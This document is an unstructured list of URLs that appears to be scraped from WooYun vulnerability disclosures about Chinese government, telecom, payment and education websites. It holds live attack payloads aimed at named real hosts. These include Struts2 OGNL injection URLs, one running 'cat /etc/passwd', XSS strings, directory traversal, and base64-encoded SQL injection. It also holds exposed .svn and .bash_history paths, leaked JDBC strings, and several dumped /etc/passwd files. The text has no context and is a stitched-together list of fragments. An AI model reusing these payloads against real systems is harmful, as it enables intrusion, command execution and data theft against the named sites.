http://events.youku.com/crowneplaza/dreams.php?target=1 http://event.youku.com/tsingtaobeer/search.php?swd=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit.x=0&submit.y=0 http://ilovenet.youku.com/list.php?page=1%2b%3Cscript%3Ealert%281%29;%3C/script%3E http://zj.118114.cn:8080/default/joblist?district=330000&keyword=1 http://www.ahosta.gov.cn:83/OSTA/indexG.action http://piao.fj.118114.cn/piao/dy/movie.action?region_code=350100 http://www.wuhan.gov.cn/frontpage/search/SearchGroup.action http://xuekao.gotedu.com/)、天天向上教务管理系统(http://www.gotedu.com/school/ http://zyjd.post.gov.cn/scorequery/beforequery.jsp http://www.chinapost.gov.cn/folder2381/index.html http://zyjd.post.gov.cn/scorequery/beforequery.jsp http://115.236.99.186/ROOT/nnl/auth.action http://hy.shenzhenpost.com.cn/shop/member!passwordRecover.action http://wap.i139.cn/dsmmp/showList.action http://xxcx.cwun.org/adminx.php http://www.022wo.com/VasRecommendList.action http://sn.vvmall.cn/index.action http://kj.xjcz.gov.cn/web/initAddWebSign.action http://search.17k.com/query.do http://api.tuan800.com/oauth/oauth/authorize?oauth_token=91ee14dfe2174d4286a2f8889d85f29d&oauth_callback=http%3A%2F%2Foauth.qunar.com%2Foauth-client%2Ftuan800%2Flogin%3Foauth_secret%3D27e05124d45b2131e3e5e20181f260ac http://api.tuan800.com/oauth/oauth/authorize?oauth_token=efeda64521c2576a827769384c045cd0&oauth_callback=http://wooyun.org http://17186.cn/ajax/account/isMobile_Liantong.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.bzldbz.gov.cn/index.action http://www.junlebao.com/regok.aspx?hid=**** 
http://www.junlebao.com/regok.aspx?hid=1016 http://www.junlebao.com/regok.aspx?hid=977 http://yun.enkj.com/fckeditor/editor/fckeditor.html http://www.dingxindai.com/?user&q=getpwd http://www.heda.gov.cn/index.action http://merchant.bestpay.com.cn/writeImg.action http://account.oppo.com/sysadmin.tar.gz http://user.migu.cn/login/index.action http://idea.91.com/ http://idea.91.com/Detail.aspx?subjectID=693#showcase http://110.249.253.166:82/gxtxm/regUser.action http://www.rcccpku.org/public/homepage/home.action http://tv.so.youku.com/index/.svn/entries http://t.stat.youku.com/.svn/entries http://111.12.149.56/wireCity/admin/admin!main.action http://111.12.149.56/wireCity/shop/shop!index.action http://pay.duowan.com/userChooseMethodAction.action http://fw.zjfda.gov.cn/sp/xkgs!list.do http://222.91.161.254:8020/login/navigation.action http://www.baison.com.cn:8012/admin.php http://big5.mofcom.gov.cn/gate/big5/url/ http://big5.mofcom.gov.cn/gate/big5/www.wooyun.org/ http://218.206.93.51:8081/manager/login.do http://baidusz.ti-net.cn/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media http://wooyun.org/bugs/wooyun-2013-027265 http://wooyun.org/bugs/wooyun-2013-031613 www.kugou.com\/newuc\/user\/resetpwd\/code=BFF40******B9029876E7FE42382110175C318F04C27*********371330DBB4367D9B3EA3********AE5835C2A275F2FE52989BDB434E74*********CDFA43DB7F91B5E9CE117BCEBCED9A7FA53F123FAE5C0F7508522E27C53BA5ABDE9****EA5FD http://www.kugou.com/newuc/user/resetpwd/code=BFF40******B9029876E7FE42382110175C318F04C27*********371330DBB4367D9B3EA3********AE5835C2A275F2FE52989BDB434E74*********CDFA43DB7F91B5E9CE117BCEBCED9A7FA53F123FAE5C0F7508522E27C53BA5ABDE9****EA5FD http://pentax.com.cn/download.html?file=./ http://pentax.com.cn/download.html?file=./../../../../../../etc/passwd shell:http://agent.keepc.com/agent/dy1.jsp http://agent.keepc.com/agent/amp/login.action jdbc:mysql://127.0.0.1/agent?useUnicode=true&characterEncoding=UTF-8 
jdbc:mysql://127.0.0.1/kc_feedback?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://127.0.0.1/kc_ad?useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://127.0.0.1/kc_epay_new2?useUnicode=true&characterEncoding=GBK jdbc:mysql://58.83.134.59:9036/xxt?characterEncoding=UTF-8 POC:http://120.196.169.167:8080/sys/sys_login!login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://120.qdphb.gov.cn/index.action http://mmbox.vnet.cn/userconfig/login_relogin.action http://gzc.songjiang.gov.cn/systemManagementDir_gzc/login.aspx http://115.239.227.141:8080 http://115.239.227.141:8080/root/root.jsp http://c3.91.com/ http://icp.cernet.com/login.do http://tag.cernet.com/login.do site:weiphone.com inurl:php得到过如下信息。 tao.dev.weiphone.com/news/index/seeNews/42.html‎ site:dev.weiphone.com http://dz.dev.weiphone.com http://passport2.dev.weiphone.com http://passport.dev.weiphone.com http://passport.dev.weiphone.com/ucenter http://passport2.dev.weiphone.com/ucenter http://www.qdzfbz.gov.cn/announcementInfoWeb!detail.action http://mchina.cn/search.action http://public.baihe.com/login.action http://sohuweiqi.com/IndexMain.action http://video.liba.com/searchResult.php?f_id=1 http://video.liba.com/detail.php?f_id=3 http://video.liba.com/detail.php?id=477&f_id=1 http://marry.liba.com/info.php http://video.liba.com/phpinfo.php http://focus.liba.com/ http://www.qhydsc.com/shop/product!list.action?pager.pageNumber=2&pager.pageSize=10&pager.orderBy=createDate&pager.orderType=asc&id=ff808081393413a60139341624bb000d 
http://www.jdcw.sjtu.edu.cn/payment/pay/payment_selBank.action?billinfo.billno=XXXXXXX http://www.tianxiaxiyan.com http://www.tianxiaxiyan.com/index.php/feast/shop_list/money/%5C.html index.php/feast/search.html www.tianxiaxiyan.com http://www.tianxiaxiyan.com/index.php/feast/search.html http://202.101.162.229/zjmsaDeclare/indexAction.action https://pay.comsys.net.cn/login.action http://fhy.wh.sdu.edu.cn/list.action?classID=1 http://payeasy.net.cn/security/login.action https://www.dingxindai.com/index.php?home&user_id=324 https://www.dingxindai.com/u/25这样的格式是你们伪静态之后的,那既然是伪静态,就自己来中转一下了注射。 https://www.dingxindai.com/u/25这个吧。中转后的地址: http://127.0.0.1/zhongzhuan.php?id=25 http://219.141.228.206/login!login.action http://www.bjcz.gov.cn/ http://sms.100866.net:8089/login/login.action http://www.aydzjc.gov.cn/下有url为http://www.aydzjc.gov.cn/common/common_info.action?wid=201111281102051004 http://www.xzwater.gov.cn/hwzwgk/main/action/main!login.action http://nj.esf.focus.cn/deal/queryByJidu.do http://www.lxzq.com.cn/admin/login.do http://email.lxzq.com.cn/admin/login.do http://ht.lxzq.cn/admin/login.do http://flash.lxzq.com.cn/admin/login.do http://stmp.moe.edu.cn/user!login.do http://www.hnssft.gov.cn/mailbox/MailBox/save.do http://www.chinasi.org.cn/index.action http://zone.wooyun.org/content/44 http://elearning.teacher.com.cn/cms/detail/index.action http://hengshan.jixi.gov.cn/ http://211.142.5.188:8064/activ/mobilZone/zmydAction!list.action;jsessionid=8FDD198834222B93F79A094692CDC1E0 http://www.dachan.com/index.action http://www.sd.10086.cn/wlan/hot_spot!query.action http://gdcnc.voole.com/movie.action http://www.rzlanshan.gov.cn/news_show_index.php?id=1110424338 url:http://video.liba.com/detail.php?f_id=3 http://www.baison.com.cn/icrm/club/web/?app_act=qing/qing/index&id=263 http://www.baison.com.cn/icrm/club/web/?app_act=qing/qing/index&id=263 www.aoshitang.com http://mail.gsedu.gov.cn/admin/ 
http://bbs.360safe.com/forum.php?mod=viewthread&tid=2118854&pid=15047210&page=8&extra=#pid15047210 http://aa\x22\x3e\x3c\x69\x6d\x67\x20\x73\x72\x63\x3d\x31\x20\x6f\x6e\x65\x72\x72\x6f\x72\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\x29\x3e//.swf[/flash http://www.tba.gov.cn/ http://www.tba.gov.cn/news/ view-source:http://yuyue.shdc.org.cn/User/cardinfo.aspx?uid=83967 http://brand.liba.com/image_info.php?groupId=0141318011629&tabId=38&albumId=43&imageId=275 http://brand.liba.com/details.php?groupId=010205257&eventId=59 http://brand.liba.com/group.php?groupId=0141318011629&tabId=41 http://brand.liba.com/phpinfo.php http://brand.liba.com/admin/login.php http://magazine.echinatobacco.com/admin/ http://mail.quanjude.com.cn:8080/gw/admin/ http://group.gd10010.cn/productInfo/product_showProductDetail.do http://www.thedream.cc http://www.thedream.cc/.bash_history http://www.36.cn/corpGlory/page/201210/register.do http://devicetracker.asus.com/select_lang.action http://devicetracker.asus.com/guige.jsp http://i.liba.com/.svn/entries https://www.chinagpay.com/bj/ https://www.chinagpay.com/sh/ http://www.tzpay.cn/moreBusiness_p.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D 
https://www.yemadai.com/deposit/toDeposit.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://123.196.114.89:8080/dzzwywt/initAction.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://xxxx/webmail/fileshare.php?inmail=1&file=MScgdW5pb24gc2VsZWN0IDEsMiwzLDQsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHdlYl91c3Igd2hlcmUgdXNyX25hbWU9J2FkbWluJyksNiw3LDgsOSwxMCwxMSwxMiwxMywxNCM= http://mail.comingchina.com/webmail/fileshare.php?file=MTEzMycgYW5kIHNsZWVwKDEwKT4wIw http://xxxx/webmail/info.php http://www.wepaychina.com/login/forgetPwd.action http://www.nongxinyin.com/member.asp?ID=207%5C http://3gbuilder.mobc.cn/zghyw/index.action http://www.zhwyd.com/index.action http://creditcard.ecitic.com/source/.svn/entries svn://22.104.2.107/%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E5%B9%B3%E5%8F%B0/%E7%BD%91%E7%AB%99%E5%8A%A8%E6%80%81%E5%8C%96/07%20%E6%BA%90%E4%BB%A3%E7%A0%81/branches/v1.0_20120809/WebRoot/source svn://22.104.2.107/%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E5%B9%B3%E5%8F%B0 svn:special svn:externals svn:needs-lock http://www.westsec.com.cn/findProfitById.action?Pid=9 http://www.lichuan.gov.cn/jact/admin/login/login.action 
http://baike.baidu.com/create/%27%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cimg%3E%27%27%27%27&enc=gbk http://www.indunet.net.cn/news/data!newslook.action http://nbsw.yundasys.com/www/fuwuwangdian_list.php?shi=0459 http://nbsw.yundasys.com/kjfs http://nbsw.yundasys.com/tellogin/ http://nbsw.yundasys.com:11324/ztb/login.php http://nbsw.yundasys.com:81/dh/w/login.php http://www.cdswsjd.gov.cn/ws/news_input.action http://123.232.123.23/index.action http://lsjn.zjsgat.gov.cn/zjlsga/lsjn/lookAt1.action http://lsqy.zjsgat.gov.cn/zjlsga/lsqy/lookAt1.action http://www.fzshbx.org/show/news/showDetail.do?tsNews.id=1682 http://www.szjsj.gov.cn/ZhuJian/NewAction_midperson.action http://bm.nbqs.net.cn/qsng-bsp/nb/apply-front!payDesc.action?area=0 http://globalalliancepartners.com/newscontent.action?articleId=2619893 http://www.quamnet.com/viewarticle.action?articleId=2883108&view=NEWS http://www.naggzy.gov.cn/upload!downCurFile.action?curId=228&obId=20111101150313%255BI%406940d4 http://www.yaqcz-168.com/navbarAction!getNavbarRelationInfo.action?ID=khwd http://www.yyxyb.gov.cn/news/news_get.action?id=ff80808138ffd7610139bef9e6780126 http://www.gdcourts.gov.cn/gdcourt/front/front!content.action?lmdm=LM20&gjid=26669 http://www.icelc.org/sh/tabLifecontent!getLifecontentList.action http://appuu.cn/app_detail.do?appId=11025 http://tjsqjw.gov.cn/userLogin.action http://app.mps.gov.cn:8686/clueAction_clueStatement.action http://jipiao.11185.cn/news/newsid!NewsById.a?Id=1200 http://search1.library.sh.cn/mylibrary/user/login.action http://oa.pyzzb.gov.cn/login.action http://www.lqedu.com.cn:8080/UserMgr/login.action http://ncda.xamwsj.gov.cn/login.action?maxFlag=true http://www.fjedu.net.cn/index.action http://www.scdxcfo.net/items/index.action?item_id=17 http://job.bjcsair.com/index.action http://elearning.teacher.com.cn/cms/detail/index.action?project=51&toolsId=2&pageType=project&blockId=2013&toolsContentId=141292 http://invest.heda.gov.cn/index.action 
http://61.143.0.179:8080/jmroes/civilian/index.action http://glxy.gdut.edu.cn/gllab/index.action http://xian.teacher.com.cn/index.action http://gdjt.ccut.edu.cn/index.action http://zs.nacta.edu.cn/front/sys/search.action http://www.njnhz.gov.cn/app/gxcompany/website/company-info.action?id=334e0c17-c3ea-4fda-b7ee-8b8135c1345f http://www.dywlr.gov.cn/inform-manage.action http://zx.smeln.gov.cn/register.action http://jc.jsspw.gov.cn:8088/website/approve/approveSiteAction!login.action http://wscwh.gaoyou.gov.cn:8060/gyAgriStore/main/login.action http://www.ccom.gov.cn/register.action http://dianzhang.org.cn/index.action http://www.tianjin-air.com/en/login.action http://zcps.tjmec.gov.cn/user!save http://www.gcjs.chaozhou.gov.cn/admin/loginAction!login.action http://djf.baoji.gov.cn/charge/login.action http://518.czstb.gov.cn/foe2013/login/login.action http://dataadmin.baoji.gov.cn/search/qyzhxx/qyzhxx!list.action?fwlxdm=15 http://bjic.baoji.gov.cn/cluster/webSiteInd/findOrgaInfo.action?orgaId=208 http://www.xzwater.gov.cn/hwzwgk/xzxk/action/xzxk!zxsq.action;jsessionid=6F98545E3924A0D9765072645B244314 http://tw.siso.edu.cn/login.action http://sp.gdgn.gov.cn/platform/login!login.action http://beta.teacher.com.cn/logout.action?errorMsg=%E7%94%A8%E6%88%B7%E5%90%8D%E5%AF%86%E7%A0%81%E9%94%99%E8%AF%AF http://ver.teacher.com.cn/teacher/tools/download/downloadAttachment.action?siteId=5&columnId=45&affixId=3931&id=53941 http://elearning.teacher.com.cn/cms/detail/articleDetail.action?project=372&toolsId=5&toolsContentId=1241&pageType=project&blockId=2015 http://jsjx.xmhcedu.gov.cn/tdesktop/login.action http://ecampus.lssh.tp.edu.tw/ecampus/Login.action http://hsddx.hznu.edu.cn:8080/HSPARTY/mainIndex!show.action?id=232 http://scebm.bda.edu.cn/Qtbm!detail.action?fSpecialtyId=201206141109331771 http://www.gdim.org.cn/ums/login.action http://mhkj.shmh.gov.cn/kjzc/login!welcome.do http://123.232.123.23/index.action http://digital.zjgws.gov.cn/ZJGHEALTH/login_news.action 
http://www.szwsj.gov.cn/indexAction_deptIndex.action?menuId=032E41EC-12EA-4E9E-B307-32B1D7D23CEC http://res.snedu.com/ERMP/getRestable.do?restableId=61000000110000754998 http://www.yxhouse.net/tbs/showestatetext.action?estateId=1513&&newsCount=18&&isR=1 http://sfzb.gzlo.gov.cn/sfzb/file.do?fileId=2C9089253E8D8D31013F0E6CF8130016 http://www.fsgjj.gov.cn/article.do?id=5e5e5e813f9dc331013f9e0bd19d0c4d http://572.i12371.cn/information/infoOneDetail.action?infoId=40288153363e15c701363e89ccd1074f&partCode=0007&orgId=572&pageCode=ORGMAINPAGE¶m=%25E6%259F%25A5%25E7%259C%258B%25E6%2596%2587%25E7%25AB%25A0 http://1143.i12371.cn/information/infoOneDetail!infoOneDetail.action?infoId=4028815335ae5cd40135bc860d0d185c&partCode=0010¶m=%25E5%25B7%25A5%25E4%25BD%259C%25E5%258A%25A8%25E6%2580%2581,%25E6%259F%25A5%25E7%259C%258B%25E6%2596%2587%25E7%25AB%25A0 http://www.i12371.cn/article/article-personpage.action?id=402881533d54ddf3013d5c846fbb5146 http://www.sdcqjy.com/column.action?exid=ZS01000005 http://www.ypjt.sh.cn/website/noticeAction!toList.action http://www.jsiu.net/jsiu/details.do?article.id=538 http://110.17.162.183:8081/btcjscorp!viewzg.do?js_corp.id=2174 http://zqfdc.net/union/doSMDetail.do?id=b39a1a9c60ec408da4d00d70f88ec62f http://61.133.195.246/dctf/sysSwReport/Com_show.do?id=381&siteType=0 http://www.ebchina.org.cn/HomePageIn/showMessage.action?id=101 http://www.gzrea.cn/download.action?id=527 http://218.76.254.228:8080/btc_ningyuan_hy/usersystem!registerContract.action http://www.sxzz.hbnu.edu.cn/FrontAction_show.action?news.id=1333 http://pt.hxpxw.net/login/login.init.do?returnUrl=http%3A%2F%2Fpt.hxpxw.net%2Felos%2Fhtml%2Findex.init.do&elnScreen=1366*768elnScreen http://123.232.28.35:8081/QZJ2012/login.action http://blog.asedu.com.cn/go.action?loginName=wangwei2007 http://www.hnep.gov.cn:82/wssb/download.action?serid=673&caseid=1304070300510001 http://www.hsgx.gov.cn/findByIdqNews.action?id=102 http://space.yonyou.com/life.php?ac=companys&op=show&uid=28397 
http://store.yonyou.com/robots.txt/.php http://store.yonyou.com/images/201204/thumb_img/409_thumb_G_1334894446503.jpg/.php http://livesupport.ku6.com/admin/create.do root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:499:499::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin saslauth:x:498:498:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin mysql:x:497:495:MySQL server:/var/lib/mysql:/bin/bash exim:x:93:93::/var/spool/exim:/sbin/nologin zabbix:x:1000:1000:zabbix user:/var/lib/zabbix:/bin/bash http://www.365wos.com/weifuwu.action http://sh.womai.com/Member/UpdateUserCategory.do http://sh.womai.com/Member/DeleteUserCategory.do filetype:do百度和google http://jf.wxcsnmg.com/login/index.action http://pay.duowan.com/listProductAction.action https://payment.yy.com/global/zh_TW/helpDetail.action http://58.83.206.138/business_chat/admin/analysis.jsp?highlight=on http://58.83.206.138/business_chat/admin/schema.jsp http://app.lenovo.com/ https://bsee.detroitmi.gov/PLCWebOnline/plcaccess/login.action 
https://js.hhs.mt.gov:8445/CCUBSProvider/login.action http://aarhus.cs.washington.edu:8005/login.action http://mk42ws.biology.duke.edu:8012/archiva/security/login.action https://xdrive.kauai.hawaii.edu/xythoswfs/webview/login.action https://stuorg.stuact.uga.edu/Secure/Login.action https://apps.umc.edu/sure/login.action http://online1.bloomfield.edu/skillportfe/login.action http://build.yingkelawyer.com/web.rar http://ipr.yingkelawyer.com/List.asp?id=37 http://bi.ts.gamebean.com/user/userLoginAction http://zxft.ywnews.cn/ftml.php?id=4注射点 http://zxft.ywnews.cn/ftml.php?id=4 http://sh.womai.com/Member/DeleteFavorite.do filetype:action http://218.205.252.16/flyingcity/genaralContent/queryDetail.action http://221.179.131.26/BusinessServer/payment/PaymentAction/paymentList.action http://218.200.212.104:8080/wctour/wap/lfm/article_detail.action http://117.139.87.23:8080/wctour/wap/lfm/article_detail.action http://120.192.246.25:8080/sxwxcsgz/initMapInfoWap.action http://221.182.104.170:9010/articles!loadHelps.action http://211.138.102.131:8083/loginjkdgj.action http://112.5.183.62:88/tax.action http://ls.139mm.cn:8080/jht_wcactive/wap/WapActive/active.do http://218.200.212.104:8080/wctour/wap/lfm/article_detail.action?catalogId=53&articleId=205 http://120.192.246.25:8088/MAKactive/NewHomeWap.action http://218.206.27.200:17071/dc/ums/preIndex.action http://117.139.87.23:8080/wctour/wap/lfm/article_detail.action?catalogId=53&articleId=172 http://www.xmobo.com/website/downloadWu.action https://www.baopay.com/user/helpCenter.action http://123.196.114.89:8080/dzzwywt/km3Action.action?deptId=2 http://ekhui.com/news/Tquestion.action http://www.chejiwang.com/market/help.action http://fm.cjdao.com/help.action?help=ntec http://person.sac.net.cn/pages/yearcheck/tran-hours-out.html http://person.sac.net.cn/pages/yearcheck/yearcheck-position-person.html http://person.sac.net.cn/pages/registration/sac-finish-person.html?rpiId=002388 
http://person.sac.net.cn/pages/train/train-line-register-list.html http://person.sac.net.cn/pages/registration/sac-publicity.html http://person.sac.net.cn/pages/registration/sac-publicity-report.html http://person.sac.net.cn/pages/registration/sac-publicity-baodai.html root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin qpidd:x:497:495:Owner Daemons:/var/lib/qpidd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:496:494:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin 
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin weblogic:x:500:500::/home/weblogic:/bin/bash http://common.51web.com/api/common/PrintAction!list.action http://218.201.14.13 http://chong.changyou.com/common/skip2game.do http://fzj.sz.gov.cn:8080/cms/templates/fzb/fzbDetails.action http://www.2277.com/index.php?r=search/course&k=123 http://wdcx.yundasys.com:11347/p3_system_web/ http://wdcx.yundasys.com:11347/p3_system_web/manage/power/sysuser_login.action http://sxpp.sina.com.cn/school/28 https://login.zhubajie.com/retrieve/index.html?mode=1 https://login.zhubajie.com/ http://xzq.wlj-china.com/12.rar FCKeditor:BasePath FCKeditor:UserFilesPath http://xzq.wlj-china.com/admin_wlj/Index.aspx http://zlgc.jmu.edu.cn/qtxs.asp?bh=503 http://www.bbszxs.com/aaa.php http://www.bbszxs.com/aaa.php?dir=/../../../../../../ http://www.bbszxs.com/bbb.php http://event20.wanmei.com/w2i/w2i5yearstory/w2i5yearstory!commentlist.action?pid=51 http://zone.wooyun.org/content/5156 http://www.nsfocus.net/vulndb/21275 http://www.qqmao.cn/index.action http://61.154.12.191:8083/npld/ http://www.nsbd.cn/ http://adminyun.net/index.action http://wap.huanqiu.com/comment.html http://wcm.ustc.edu.cn/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers http://wcm.ustc.edu.cn/wcm http://localhost/destoon/admin.php?file=admin&action=edit&userid=1 http://localhost/destoon/admin.php?moduleid=1&file=admin http://localhost/destoon/admin.php?moduleid=1&file=admin&action=add http://localhost/destoon/admin.php?file=database http://localhost/destoon/admin.php?file=database&action=process http://localhost/destoon/admin.php?rand=92&file=database&action=execute http://localhost/destoon/admin.php?rand=92&file=database&action=execute http://60years.scut.edu.cn/index.action http://bbs.weiqi.tom.com http://ebiz.cpic.com.cn/ywx/inbuilt.do?method=initInbuiltView&musterId=17538585 
http://ebiz.cpic.com.cn/ywx/inbuilt.do?method=queryPolicyInbuiltSingle http://jf.ztgame.com/member?type=sign&page=13 http://www.cdpta.com/netpage/index.do http://www.huawei.com/cn/security/psirt/security-bulletins/security-advisories/hw-u_194647.htm http://www.panpanfood.com/admin/admin.asp http://112.11.131.218/doc/page/login.asp http://220.181.47.151/ guest:admin http://ecc.pku.edu.cn/index.action http://www.wooyun.org/bugs/wooyun-2010-031347/trace/baf4da61c8d7d17a95fee76f7bccca3c http://bmw.womai.com/bmw/user/login.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin 
